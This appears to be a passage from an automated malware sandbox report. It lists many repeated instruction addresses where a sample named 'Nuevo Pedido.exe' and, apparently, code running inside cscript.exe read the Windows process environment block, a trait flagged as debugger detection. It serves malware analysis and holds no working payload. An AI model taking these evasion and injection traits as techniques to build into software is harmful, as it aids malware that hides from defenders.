            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]3_2_019E4D3B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]3_2_019E4D3B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]3_2_019E4D3B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]3_2_019C3D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BAD30 mov eax, dword ptr fs:[00000030h]3_2_019BAD30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D7D50 mov eax, dword ptr fs:[00000030h]3_2_019D7D50
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F3D43 mov eax, dword ptr fs:[00000030h]3_2_019F3D43
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A33540 mov eax, dword ptr fs:[00000030h]3_2_01A33540
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DC577 mov eax, dword ptr fs:[00000030h]3_2_019DC577
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DC577 mov eax, dword ptr fs:[00000030h]3_2_019DC577
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C849B mov eax, dword ptr fs:[00000030h]3_2_019C849B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]3_2_01A36CF0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]3_2_01A36CF0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]3_2_01A36CF0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A714FB mov eax, dword ptr fs:[00000030h]3_2_01A714FB
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88CD6 mov eax, dword ptr fs:[00000030h]3_2_01A88CD6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]3_2_01A71C06
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]3_2_01A8740D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]3_2_01A8740D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]3_2_01A8740D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]3_2_01A36C0A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]3_2_01A36C0A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]3_2_01A36C0A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]3_2_01A36C0A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EBC2C mov eax, dword ptr fs:[00000030h]3_2_019EBC2C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA44B mov eax, dword ptr fs:[00000030h]3_2_019EA44B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D746D mov eax, dword ptr fs:[00000030h]3_2_019D746D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h]3_2_01A4C450
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h]3_2_01A4C450
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C8794 mov eax, dword ptr fs:[00000030h]3_2_019C8794
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]3_2_01A37794
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]3_2_01A37794
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]3_2_01A37794
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F37F5 mov eax, dword ptr fs:[00000030h]3_2_019F37F5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DF716 mov eax, dword ptr fs:[00000030h]3_2_019DF716
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h]3_2_019EA70E
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h]3_2_019EA70E
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h]3_2_01A8070D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h]3_2_01A8070D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EE730 mov eax, dword ptr fs:[00000030h]3_2_019EE730
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h]3_2_01A4FF10
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h]3_2_01A4FF10
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h]3_2_019B4F2E
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h]3_2_019B4F2E
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88F6A mov eax, dword ptr fs:[00000030h]3_2_01A88F6A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CEF40 mov eax, dword ptr fs:[00000030h]3_2_019CEF40
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CFF60 mov eax, dword ptr fs:[00000030h]3_2_019CFF60
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A346A7 mov eax, dword ptr fs:[00000030h]3_2_01A346A7
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]3_2_01A80EA5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]3_2_01A80EA5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]3_2_01A80EA5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4FE87 mov eax, dword ptr fs:[00000030h]3_2_01A4FE87
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E36CC mov eax, dword ptr fs:[00000030h]3_2_019E36CC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F8EC7 mov eax, dword ptr fs:[00000030h]3_2_019F8EC7
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6FEC0 mov eax, dword ptr fs:[00000030h]3_2_01A6FEC0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88ED6 mov eax, dword ptr fs:[00000030h]3_2_01A88ED6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E16E0 mov ecx, dword ptr fs:[00000030h]3_2_019E16E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C76E2 mov eax, dword ptr fs:[00000030h]3_2_019C76E2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h]3_2_019EA61C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h]3_2_019EA61C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6FE3F mov eax, dword ptr fs:[00000030h]3_2_01A6FE3F
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]3_2_019BC600
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]3_2_019BC600
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]3_2_019BC600
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E8E00 mov eax, dword ptr fs:[00000030h]3_2_019E8E00
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71608 mov eax, dword ptr fs:[00000030h]3_2_01A71608
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BE620 mov eax, dword ptr fs:[00000030h]3_2_019BE620
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h]3_2_01A7AE44
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h]3_2_01A7AE44
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C766D mov eax, dword ptr fs:[00000030h]3_2_019C766D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479746D mov eax, dword ptr fs:[00000030h]16_2_0479746D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA44B mov eax, dword ptr fs:[00000030h]16_2_047AA44B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848CD6 mov eax, dword ptr fs:[00000030h]16_2_04848CD6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047ABC2C mov eax, dword ptr fs:[00000030h]16_2_047ABC2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]16_2_047F6C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]16_2_047F6C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]16_2_047F6C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]16_2_047F6C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048314FB mov eax, dword ptr fs:[00000030h]16_2_048314FB
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]16_2_0484740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]16_2_0484740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]16_2_0484740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]16_2_047F6CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]16_2_047F6CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]16_2_047F6CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h]16_2_0480C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h]16_2_0480C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478849B mov eax, dword ptr fs:[00000030h]16_2_0478849B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h]16_2_0479C577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h]16_2_0479C577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048405AC mov eax, dword ptr fs:[00000030h]16_2_048405AC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048405AC mov eax, dword ptr fs:[00000030h]16_2_048405AC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04797D50 mov eax, dword ptr fs:[00000030h]16_2_04797D50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B3D43 mov eax, dword ptr fs:[00000030h]16_2_047B3D43
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3540 mov eax, dword ptr fs:[00000030h]16_2_047F3540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]16_2_047A4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]16_2_047A4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]16_2_047A4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AD30 mov eax, dword ptr fs:[00000030h]16_2_0477AD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047FA537 mov eax, dword ptr fs:[00000030h]16_2_047FA537
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]16_2_0483FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]16_2_0483FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]16_2_0483FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]16_2_0483FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04828DF1 mov eax, dword ptr fs:[00000030h]16_2_04828DF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h]16_2_0478D5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h]16_2_0478D5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848D34 mov eax, dword ptr fs:[00000030h]16_2_04848D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov ecx, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483E539 mov eax, dword ptr fs:[00000030h]16_2_0483E539
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]16_2_047A1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]16_2_047A1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]16_2_047A1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A35A1 mov eax, dword ptr fs:[00000030h]16_2_047A35A1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h]16_2_047AFD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h]16_2_047AFD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FE87 mov eax, dword ptr fs:[00000030h]16_2_0480FE87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478766D mov eax, dword ptr fs:[00000030h]16_2_0478766D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]16_2_04840EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]16_2_04840EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]16_2_04840EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482FEC0 mov eax, dword ptr fs:[00000030h]16_2_0482FEC0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848ED6 mov eax, dword ptr fs:[00000030h]16_2_04848ED6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477E620 mov eax, dword ptr fs:[00000030h]16_2_0477E620
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h]16_2_047AA61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h]16_2_047AA61C
